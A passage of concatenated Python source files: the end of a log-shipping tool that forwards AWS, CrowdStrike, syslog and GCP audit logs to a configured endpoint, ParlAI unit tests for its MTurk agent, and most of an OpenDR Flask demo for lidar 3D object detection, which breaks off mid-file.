response = self.sqs_client.receive_message(QueueUrl=self.sqs_q, MessageAttributeNames=["All"],
WaitTimeSeconds=10, VisibilityTimeout=300, MaxNumberOfMessages=1)
message = json.loads(response["Messages"][0]["Body"])
name = message["Records"][0]["s3"]["bucket"]["name"]
key = message["Records"][0]["s3"]["object"]["key"]
receipt_handle = response["Messages"][0]["ReceiptHandle"]
return name, key, receipt_handle
def get_content(self, bucket1, key1):
"""Read in the gzip'd message."""
response = self.s3_client.get_object(Bucket=bucket1, Key=key1)
json_file = json.load(gzip.GzipFile(None, 'rb', None, BytesIO(response['Body'].read())))
return json_file["Records"]
def delete_message(self, handle1):
"""Delete the message from the SQS queue."""
return self.sqs_client.delete_message(QueueUrl=self.sqs_q, ReceiptHandle=handle1)
def ingest_event(self, record1):
"""Ingest the parsed event."""
return self.http.request("POST",
self.dest_url,
body=record1,
headers={"Content-Type": "application/json", "Authorization": f"Bearer {self.dest_token}"}
)
def kill(self):
"""Set the kill flag."""
self.killed = True
class SIEMConnector(threading.Thread):
"""SIEM connector class."""
def __init__(self, source_loc, dest_url, dest_token, name="siem-connector"):
"""Initialize the SIEM connector object."""
threading.Thread.__init__(self)
self.name = name
self.source_loc = source_loc
self.dest_url = dest_url
self.dest_token = dest_token
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Run the connector."""
count = 0
logger.debug('Starting %s', self.name)
if Path(self.source_loc).is_file():
logger.debug('filename: %s', self.source_loc)
newevent = ''
with open(self.source_loc, encoding="utf-8") as source_file:
for line in self.read_streaming_file(source_file):
newevent = newevent + line.rstrip()
if line.rstrip() == '}':
count = count + 1
read_event = json.loads(newevent)
logger.debug('Count = %s', str(count))
self.ingest_event(json.dumps(read_event)+'\n')
newevent = ''
logger.debug('Stopping %s', self.name)
def read_streaming_file(self, source_loc1):
"""Read in the contents of the streamed file."""
interval = 0.2
while not self.killed:
_ = source_loc1.tell()
line = source_loc1.readline()
if not line:
logger.debug('sleeping... %s', self.name)
time.sleep(interval)
else:
yield line
def ingest_event(self, event1):
"""Ingest the parsed event."""
return self.http.request("POST",
self.dest_url,
body=event1,
headers={"Content-Type": "application/json", "Authorization": f"Bearer {self.dest_token}"}
)
def kill(self):
"""Set the kill flag."""
self.killed = True
class Syslog(threading.Thread):
"""Class to represent a SysLog connection."""
def __init__(self,
source_loc,
source_cat,
dest_type,
dest_url,
dest_token,
name="syslog"
):
"""Initialize the Syslog object."""
threading.Thread.__init__(self)
self.name = name
self.source_loc = source_loc
self.source_cat = source_cat
self.dest_type = dest_type
self.dest_url = dest_url
self.dest_token = dest_token
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Start the connector."""
logger.debug('Starting %s', self.name)
if (Path(self.source_loc).is_file() and self.source_cat == 'folder') \
or Path(self.source_loc).is_dir() and self.source_cat == 'file':
logger.debug(self.source_loc+' is not '+self.source_cat)
else:
pos = {}
if Path(self.name).exists():
try:
with open(self.name, 'r') as pfr:
pos = json.load(pfr)
logger.debug('history loaded..')
except Exception as erred:
logger.debug(erred)
pos = {}
else:
pos = {}
self.read_content(pos, self.source_loc)
def read_content(self, pos1, source_loc1):
"""Read the SysLog file contents."""
while not self.killed:
new_content = False
# expand and validate source_loc1 with os type and file types and wildcards
for file in self.get_files(source_loc1):
try:
# pylint: disable=R1732
if (file in pos1 and pos1[file] == 'error') or ("\0" in open(file).read(512)):
continue
with open(file) as content_file:
# MD5 is used here to determine position only.
header = hashlib.md5(content_file.read(512).encode('utf-8')).hexdigest() # nosec
with open(file) as file_handle:
mapped = mmap.mmap(file_handle.fileno(), 0, prot=mmap.PROT_READ) # pylint: disable=I1101
if header not in pos1:
pos1[header] = mapped.tell()
else:
mapped.seek(pos1[header])
while True:
line = mapped.readline()
if not line:
break
pos1[header] = mapped.tell()
new_content = True
self.ingest_event(line.decode('utf-8'), file)
except Exception as erred:
pos1[file] = 'error'
logger.debug("%s : %s", str(file), str(erred))
continue
if new_content:
logger.debug('updating data...')
self.write_inv(pos1)
time.sleep(0.1)
@staticmethod
def get_files(source_loc2):
"""Retrieve the files from the log content.
Validate and expand by wildcard and OS type.
"""
files = glob.glob(source_loc2+'/**', recursive=True)
return [f for f in files if os.path.isfile(f)]
def ingest_event(self, event1, file1):
"""Ingest the parsed event."""
event2 = {"@rawstring": event1, "#source": file1, "#host": hostname}
return self.http.request("POST",
self.dest_url,
body=json.dumps(event2),
headers={
"Content-Type": "text/plain",
"charset": "utf-8",
"Authorization": f"Bearer {self.dest_token}"
}
)
def write_inv(self, pos2):
"""Store our position in the file."""
with open(self.name, 'w') as pfw:
json.dump(pos2, pfw)
def kill(self):
"""Set the kill flag."""
self.killed = True
class GCPAuditLog(threading.Thread):
"""Class to represent a GCP audit log connection."""
def __init__(self,
proj_id,
sub_id,
cred_path,
dest_url,
dest_token,
name="gcp-audit-log"
):
"""Initialize the GCP Audit object."""
threading.Thread.__init__(self)
self.name = name
self.proj_id = proj_id
self.sub_id = sub_id
self.cred_path = cred_path
self.dest_url = dest_url
self.dest_token = dest_token
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self.cred_path
self.subscriber = pubsub_v1.SubscriberClient()
self.sub_path = self.subscriber.subscription_path(self.proj_id, self.sub_id)
self.http = urllib3.PoolManager()
self.killed = False
def callback(self, message: pubsub_v1.subscriber.message.Message):
"""Handle callbacks to ingest event."""
while not self.killed:
self.ingest_event(message.data)
message.ack()
def run(self):
"""Run the connector and set the trace."""
sys.settrace(self.globaltrace)
# timeout = 5.0
logger.debug("Starting %s", self.name)
streaming_pull_future = self.subscriber.subscribe(self.sub_path, callback=self.callback)
logger.debug("Listening for messages on %s", self.sub_path)
with self.subscriber:
time.sleep(5)
try:
streaming_pull_future.result()
except TimeoutError:
streaming_pull_future.cancel()
streaming_pull_future.result()
except KeyboardInterrupt:
streaming_pull_future.cancel()
sys.exit(1)
except Exception as erred:
logger.debug(erred.args[0])
sys.exit(1)
def globaltrace(self, frame, event, arg): # pylint: disable=W0613
"""Return the local trace for `call` events."""
returned = None
if event == 'call':
returned = self.localtrace
return returned
def localtrace(self, frame, event, arg): # pylint: disable=W0613
"""Raise SystemExit on the next line called."""
if self.killed:
if event == 'line':
raise SystemExit("Thread quitting")
return self.localtrace
def ingest_event(self, event1):
"""Ingest the parsed event."""
# auth_token = ' Bearer '+self.dest_token
return self.http.request("POST",
self.dest_url,
body=event1,
headers={"Content-Type": "application/json", "Authorization": f"Bearer {self.dest_token}"}
)
def kill(self):
"""Set the kill flag."""
self.killed = True
class GracefulShutdown:
"""Class to handle graceful shutdown."""
shutdown = False
def __init__(self):
"""Initialize the class and set the exit handlers."""
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGTERM, self.graceful_shutdown)
def graceful_shutdown(self, *args): # pylint: disable=W0613
"""Set the shutdown flag."""
self.shutdown = True
if __name__ == "__main__":
threads = []
try:
config = configparser.ConfigParser()
config.read("logshipper.conf")
for i in config.sections():
logger.debug("**** Section: %s ****", i)
logger.debug(config.items(i))
if config[i]["source_type"] == "crwd-fdr":
thread1 = FDR2Humio(config[i]["access_key"], config[i]["secret_key"], config[i]["sqs_queue_url"],
config[i]["region"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread1.daemon = True
thread1.start()
threads.append([thread1, "crwd-fdr"])
if config[i]["source_type"] == "aws-cloudtrail":
thread1 = CloudTrail(config[i]["access_key"], config[i]["secret_key"], config[i]["sqs_queue_url"],
config[i]["region"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread1.daemon = True
thread1.start()
threads.append([thread1, "aws-cloudtrail"])
if config[i]["source_type"] == "crwd-siem-connector":
thread2 = SIEMConnector(config[i]["source_location"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread2.daemon = True
thread2.start()
threads.append([thread2, "crwd-siem-connector"])
if config[i]["source_type"] == "syslog":
thread3 = Syslog(config[i]["source_location"], config[i]["source_category"], config[i]
["dest_type"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread3.daemon = True
thread3.start()
threads.append([thread3, "syslog"])
if config[i]["source_type"] == "gcp-audit-log":
thread4 = GCPAuditLog(config[i]["project_id"], config[i]["subscription_id"], config[i]
["credential_path"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread4.daemon = True
thread4.start()
threads.append([thread4, "gcp-audit-log"])
except configparser.NoOptionError as err:
raise SystemExit(f"No option error.\n{err}") from err
except Exception as err:
raise SystemExit(err) from err
shipper = GracefulShutdown()
while not shipper.shutdown:
# Check thread status
# for thread in threads:
# if not thread[0].isAlive():
# # restart thread
time.sleep(2)
for running_thread in threads:
running_thread[0].kill()
running_thread[0].join()
if not running_thread[0].isAlive():
print("Thread killed.")
print("Process shutdown.")
|
test_mturk_agent.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import unittest
import os
import time
import threading
from unittest import mock
from parlai.mturk.core.agents import MTurkAgent, AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.worker_manager as WorkerManagerFile
import parlai.mturk.core.data_model as data_model
parent_dir = os.path.dirname(os.path.abspath(__file__))
WorkerManagerFile.DISCONNECT_FILE_NAME = 'disconnect-test.pickle'
WorkerManagerFile.MAX_DISCONNECTS = 1
WorkerManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE, AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING, AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE, AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED, AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
class TestAssignState(unittest.TestCase):
"""Various unit tests for the AssignState class"""
def setUp(self):
self.agent_state1 = AssignState()
self.agent_state2 = AssignState(status=AssignState.STATUS_IN_TASK)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt,
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
def tearDown(self):
self.mturk_manager.shutdown()
def test_assign_state_init(self):
'''Test proper initialization of assignment states'''
self.assertEqual(self.agent_state1.status, AssignState.STATUS_NONE)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(self.agent_state2.status, AssignState.STATUS_IN_TASK)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
def test_message_management(self):
'''Test message management in an AssignState'''
# Ensure message appends succeed and are idempotent
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 1)
self.agent_state1.append_message(MESSAGE_2)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.assertEqual(len(self.agent_state2.get_messages()), 0)
self.assertIn(MESSAGE_1, self.agent_state1.get_messages())
self.assertIn(MESSAGE_2, self.agent_state1.get_messages())
self.assertEqual(len(self.agent_state1.message_ids), 2)
self.agent_state2.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state2.message_ids), 1)
# Ensure command interactions work as expected
self.agent_state1.set_last_command(COMMAND_1)
self.assertEqual(self.agent_state1.get_last_command(), COMMAND_1)
# Ensure clearing messages acts as intended and doesn't clear agent2
self.agent_state1.clear_messages()
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(len(self.agent_state2.message_ids), 1)
def test_state_handles_status(self):
'''Ensures status updates and is_final are valid'''
for status in statuses:
self.agent_state1.set_status(status)
self.assertEqual(self.agent_state1.get_status(), status)
for status in active_statuses:
self.agent_state1.set_status(status)
self.assertFalse(self.agent_state1.is_final())
for status in complete_statuses:
self.agent_state1.set_status(status)
self.assertTrue(self.agent_state1.is_final())
# TODO update the below once bonus is default
for status in complete_statuses:
self.agent_state1.set_status(status)
text, command = self.agent_state1.get_inactive_command_text()
self.assertIsNotNone(text)
self.assertIsNotNone(command)
class TestMTurkAgent(unittest.TestCase):
"""Various unit tests for the MTurkAgent class"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt.copy(),
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
self.turk_agent = MTurkAgent(
self.opt.copy(), self.mturk_manager,
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1)
def tearDown(self):
self.mturk_manager.shutdown()
disconnect_path = os.path.join(parent_dir, 'disconnect-test.pickle')
if os.path.exists(disconnect_path):
os.remove(disconnect_path)
def test_init(self):
'''Test initialization of an agent'''
self.assertIsNotNone(self.turk_agent.creation_time)
self.assertIsNone(self.turk_agent.id)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertIsNone(self.turk_agent.conversation_id)
self.assertFalse(self.turk_agent.some_agent_disconnected)
self.assertFalse(self.turk_agent.hit_is_expired)
self.assertFalse(self.turk_agent.hit_is_abandoned)
self.assertFalse(self.turk_agent.hit_is_returned)
self.assertFalse(self.turk_agent.hit_is_complete)
self.assertFalse(self.turk_agent.disconnected)
self.assertTrue(self.turk_agent.alived)
def test_state_wrappers(self):
'''Test the mturk agent wrappers around its state'''
for status in statuses:
self.turk_agent.set_status(status)
self.assertEqual(self.turk_agent.get_status(), status)
for status in [
AssignState.STATUS_DONE,
AssignState.STATUS_PARTNER_DISCONNECT
]:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.submitted_hit())
for status in active_statuses:
self.turk_agent.set_status(status)
self.assertFalse(self.turk_agent.is_final())
for status in complete_statuses:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.is_final())
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 1)
self.turk_agent.append_message(MESSAGE_2)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.assertIn(MESSAGE_1, self.turk_agent.get_messages())
self.assertIn(MESSAGE_2, self.turk_agent.get_messages())
# Ensure command interactions work as expected
self.turk_agent.set_last_command(COMMAND_1)
self.assertEqual(self.turk_agent.get_last_command(), COMMAND_1)
self.turk_agent.clear_messages()
self.assertEqual(len(self.turk_agent.get_messages()), 0)
# In task checks
self.turk_agent.conversation_id = 't_12345'
self.assertTrue(self.turk_agent.is_in_task())
self.turk_agent.conversation_id = 'b_12345'
self.assertFalse(self.turk_agent.is_in_task())
def test_connection_id(self):
'''Ensure the connection_id hasn't changed'''
connection_id = "{}_{}".format(
self.turk_agent.worker_id, self.turk_agent.assignment_id)
self.assertEqual(self.turk_agent.get_connection_id(), connection_id)
def test_inactive_data(self):
'''Ensure data packet generated for inactive commands is valid'''
for status in complete_statuses:
self.turk_agent.set_status(status)
data = self.turk_agent.get_inactive_command_data()
self.assertIsNotNone(data['text'])
self.assertIsNotNone(data['inactive_text'])
self.assertEqual(
data['conversation_id'], self.turk_agent.conversation_id)
self.assertEqual(data['agent_id'], TEST_WORKER_ID_1)
def test_status_change(self):
has_changed = False
self.turk_agent.set_status(AssignState.STATUS_ONBOARDING)
def wait_for_status_wrap():
nonlocal has_changed # noqa 999 we don't use python2
self.turk_agent.wait_for_status(AssignState.STATUS_WAITING)
has_changed = True
t = threading.Thread(target=wait_for_status_wrap, daemon=True)
t.start()
self.assertFalse(has_changed)
time.sleep(0.07)
self.assertFalse(has_changed)
self.turk_agent.set_status(AssignState.STATUS_WAITING)
time.sleep(0.07)
self.assertTrue(has_changed)
def test_message_queue(self):
'''Ensure observations and acts work as expected'''
self.mturk_manager.send_message = mock.MagicMock()
self.turk_agent.observe(ACT_1)
self.mturk_manager.send_message.assert_called_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1, ACT_1)
# First act comes through the queue and returns properly
self.assertTrue(self.turk_agent.msg_queue.empty())
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.recieved_packets[MESSAGE_ID_1])
self.assertFalse(self.turk_agent.msg_queue.empty())
returned_act = self.turk_agent.get_new_act_message()
self.assertEqual(returned_act, ACT_1)
# Repeat act is ignored
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.msg_queue.empty())
for i in range(100):
self.turk_agent.put_data(str(i), ACT_1)
self.assertEqual(self.turk_agent.msg_queue.qsize(), 100)
self.turk_agent.flush_msg_queue()
self.assertTrue(self.turk_agent.msg_queue.empty())
# Test non-act messages
blank_message = self.turk_agent.get_new_act_message()
self.assertIsNone(blank_message)
self.turk_agent.disconnected = True
disconnect_message = self.turk_agent.get_new_act_message()
self.turk_agent.disconnected = False
self.assertEqual(disconnect_message['text'],
self.turk_agent.MTURK_DISCONNECT_MESSAGE)
self.turk_agent.hit_is_returned = True
return_message = self.turk_agent.get_new_act_message()
self.assertEqual(
return_message['text'], self.turk_agent.RETURN_MESSAGE)
self.turk_agent.hit_is_returned = False
# Reduce state
self.turk_agent.reduce_state()
self.assertIsNone(self.turk_agent.msg_queue)
self.assertIsNone(self.turk_agent.recieved_packets)
def test_message_acts(self):
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
# non-Blocking check
self.assertIsNone(self.turk_agent.message_request_time)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertEqual(returned_act, ACT_1)
self.mturk_manager.send_command.assert_called_once()
# non-Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
while returned_act is None:
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
# Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
if __name__ == '__main__':
unittest.main(buffer=True)
|
demo.py
|
# Copyright 2020-2021 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import os
import argparse
import threading
import time
import numpy as np
import cv2
from flask import Flask, Response, render_template, request
# OpenDR imports
from opendr.perception.object_detection_3d import VoxelObjectDetection3DLearner
from data_generators import (
lidar_point_cloud_generator,
disk_point_cloud_generator,
)
from draw_point_clouds import (
draw_point_cloud_bev,
draw_point_cloud_projected_numpy,
)
TEXT_COLOR = (255, 112, 255) # B G R
# Initialize the output frame and a lock used to ensure thread-safe
# exchanges of the output frames (useful for multiple browsers/tabs
# are viewing tthe stream)
output_frame = None
lock = threading.Lock()
point_cloud_generator = None
keys_pressed = []
lidar_type = "velodyne"
# initialize a flask object
app = Flask(__name__)
def rplidar(*args, **kwargs):
from rplidar_processor import RPLidar
return RPLidar(*args, **kwargs)
def o3mlidar(*args, **kwargs):
from o3m_lidar.o3m_lidar import O3MLidar
return O3MLidar(*args, **kwargs)
@app.route("/")
def index():
# return the rendered template
return render_template("index.html")
def runnig_fps(alpha=0.1):
t0 = time.time()
fps_avg = 10
def wrapped():
nonlocal t0, alpha, fps_avg
t1 = time.time()
delta = t1 - t0
t0 = t1
fps_avg = alpha * (1 / delta) + (1 - alpha) * fps_avg
return fps_avg
return wrapped
def draw_fps(frame, fps):
cv2.putText(
frame,
f"{fps:.1f} FPS",
(10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX,
1,
TEXT_COLOR,
1,
)
def draw_dict(frame, dict, scale=5):
i = 0
for k, v in dict.items():
cv2.putText(
frame,
f"{k}: {v}",
(10, frame.shape[0] - 10 - 30 * scale * i),
cv2.FONT_HERSHEY_SIMPLEX,
scale,
TEXT_COLOR,
scale,
)
i += 1
def stack_images(images, mode="horizontal"):
max_width, max_height = 0, 0
for image in images:
width, height, _ = image.shape
max_width = max(max_width, width)
max_height = max(max_height, height)
if mode == "horizontal":
for i in range(len(images)):
width, _, _ = images[i].shape
delta = max_width - width
pad = delta // 2
images[i] = np.pad(
images[i], [(pad, pad + delta % 2), (0, 0), (0, 0)]
)
return cv2.hconcat(images)
elif mode == "vertical":
for i in range(len(images)):
_, height, _ = images[i].shape
delta = max_height - height
pad = delta // 2
images[i] = np.pad(
images[i], [(0, 0), (pad, pad + delta % 2), (0, 0)]
)
return cv2.vconcat(images)
def voxel_object_detection_3d(config_path, model_name=None):
global point_cloud_generator, output_frame, lock, lidar_type
with lock:
output_frame = np.zeros((400, 400, 3), dtype=np.uint8)
draw_dict(output_frame, {"Loading": "model"}, 1)
# Prep stats
fps = runnig_fps()
predict = model_name is not None and model_name != "None"
if predict:
# Init model
detection_learner = VoxelObjectDetection3DLearner(config_path)
if model_name is not None and not os.path.exists(
"./models/" + model_name
):
detection_learner.download(model_name, "./models")
detection_learner.load("./models/" + model_name, verbose=True)
print("Learner created")
else:
detection_learner = None
def process_key(key):
nonlocal tvec, rvec, fx, fy
dt = 1.2
dr = math.pi / 10
if key == 2:
tvec += np.array([0.00, dt, 0.00], dtype=np.float32)
elif key == 3:
tvec += np.array([-dt, 0.00, 0.00], dtype=np.float32)
elif key == 0:
tvec += np.array([0.00, -dt, 0.00], dtype=np.float32)
elif key == 1:
tvec += np.array([dt, 0.00, 0.00], dtype=np.float32)
if key == 4:
rvec += np.array([0.00, dr, 0.00], dtype=np.float32)
elif key == 5:
rvec += np.array([-dr, 0.00, 0.00], dtype=np.float32)
elif key == 6:
rvec += np.array([0.00, -dr, 0.00], dtype=np.float32)
elif key == 7:
rvec += np.array([dr, 0.00, 0.00], dtype=np.float32)
elif key == 8:
rvec += np.array([0.00, 0.00, -dr], dtype=np.float32)
elif key == 9:
rvec += np.array([0.00, 0.00, dr], dtype=np.float32)
elif key == 10:
fx /= 1.5
elif key == 11:
fx *= 1.5
elif key == 12:
fy /= 1.5
elif key == 13:
fy *= 1.5
elif key == 14:
tvec += np.array([0.00, 0.00, dt], dtype=np.float32)
elif key == 15:
tvec += np.array([0.00, 0.00, -dt], dtype=np.float32)
elif key == 98:
tvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
elif key == 99:
rvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
elif key == 100:
tvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
rvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
fx = 10
fy = 10
if lidar_type == "velodyne":
xs = [-20, 90]
ys = [-50, 50]
scale = 20
image_size_x = 1000
image_size_y = 1000
font_scale = 4
tvec = np.array([10.8, 8.34, 16.8], dtype=np.float32)
rvec = np.array([-10.67, 26.69, 6.914], dtype=np.float32)
fx = 864.98
fy = 864.98
elif lidar_type == "rplidar":
xs = [-10, 10]
ys = [-10, 10]
scale = 30
image_size_x = 60
image_size_y = 6
tvec = np.array([10.8, 8.34, 16.8], dtype=np.float32)
rvec = np.array([-10.67, 26.69, 6.914], dtype=np.float32)
fx = 864.98
fy = 864.98
font_scale = 0.5
elif lidar_type == "o3mlidar":
xs = [-8, 8]
ys = [-8, 8]
scale = 40
image_size_x = 600
image_size_y = 600
font_scale = 1
tvec = np.array([4.8, 2.4, 13.2], dtype=np.float32)
rvec = np.array([-6.28, 15.39, 5.03], dtype=np.float32)
fx = 864.98
fy = 864.98
else:
xs = [-20, 90]
ys = [-50, 50]
scale = 20
image_size_x = 1000
image_size_y = 3000
font_scale = 4
while True:
try:
t = time.time()
point_cloud = next(point_cloud_generator)
pc_time = time.time() - t
if len(point_cloud.data) <= 0:
continue
t = time.time()
if predict:
predictions = detection_learner.infer(point_cloud)
else:
predictions = []
if len(predictions) > 0:
print(
"found", len(predictions), "objects",
)
predict_time = time.time() - t
t = time.time()
frame_bev_2 = draw_point_cloud_bev(
point_cloud.data, predictions, scale, xs, ys
)
frame_proj_2 = draw_point_cloud_projected_numpy(
point_cloud.data,
predictions,
tvec=tvec,
rvec=rvec,
image_size_x=image_size_x,
image_size_y=image_size_y,
fx=fx,
fy=fy,
)
frame = frame_proj_2
frame = stack_images([frame, frame_bev_2], "horizontal")
draw_time = time.time() - t
total_time = pc_time + predict_time + draw_time
draw_dict(
frame,
{
"FPS": fps(),
"predict": str(int(predict_time * 100 / total_time)) + "%",
"get data": str(int(pc_time * 100 / total_time)) + "%",
"draw": str(int(draw_time * 100 / total_time)) + "%",
},
font_scale,
)
for key in keys_pressed:
process_key(key)
keys_pressed.clear()
with lock:
output_frame = frame.copy()
except FileExistsError as e:
print(e)
def generate():
# grab global references to the output frame and lock variables
global output_frame, lock
# loop over frames from the output stream
while True:
# wait until the lock is acquired
with lock:
# check if the output frame is available, otherwise skip
# the iteration of the loop
if output_frame is None:
continue
# encode the frame in JPEG format
(flag, encodedImage) = cv2.imencode(".jpg", output_frame)
# ensure the frame was successfully encoded
if not flag:
continue
# yield the output frame in the byte format
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" +
bytearray(encodedImage) +
b"\r\n"
)
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(
generate(), mimetype="multipart/x-mixed-replace; boundary=frame"
)
@app.route("/keypress", methods=["POST"])
def process_keypress():
global keys_pressed
data = request.get_json()
key = data["key"]
keys_pressed.append(key)
return ("", 204)
# check to see if this is the main thread of execution
if __name__ == "__main__":
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument(
"-i", "--ip", type=str, required=True, help="IP address of the device"
)
ap.add_argument(
"-o",
"--port",
type=int,
required=True,
help="Ephemeral port number of the server (1024 to 65535)",
)
ap.add_argument(
"-mn",
"--model_name",
type=str,
default="None",
help="Pretrained model name",
)
ap.add_argument(
"-mc",
"--model_config",
type=str,
default="None",
help="Model configuration file",
)
ap.add_argument(
"-s", "--source", type=str, default="disk", help="Data source",
)
ap.add_argument(
"-dp",
"--data_path",
type=str,
default="",
help="Path for disk-based data generators",
)
ap.add_argument(
"-a",
"--algorithm",
type=str,
default="voxel",
help="Which algortihm to run",
choices=["voxel"],
)
ap.add_argument(
"-rpp",
"--rplidar_port",
type=str,
default="",
help="Port for RPLidar",
)
ap.add_argument(
"-o3mp",
"--o3m_port",
type=int,
default=42000,
help="Port for O3M Lidar",
)
ap.add_argument(
"-o3mip",
"--o3m_ip",
type=str,
default="0.0.0.0",
help="IP for O3M Lidar",
)
ap.add_argument(
"-o3mbs",
"--o3m_buffer_size",
type=int,
default=1460,
help="Buffer size for O3M Lidar",
)
args = vars(ap.parse_args())
point_cloud_generator = {
"disk": lambda: disk_point_cloud_generator(
args["data_path"], count=None
),
"rplidar": lambda: lidar_point_cloud_generator(
rplidar(args["rplidar_port"])
),
"o3mlidar": lambda: lidar_point_cloud_generator(
o3mlidar(
ip=args["o3m_ip"],
port=args["o3m_port"],
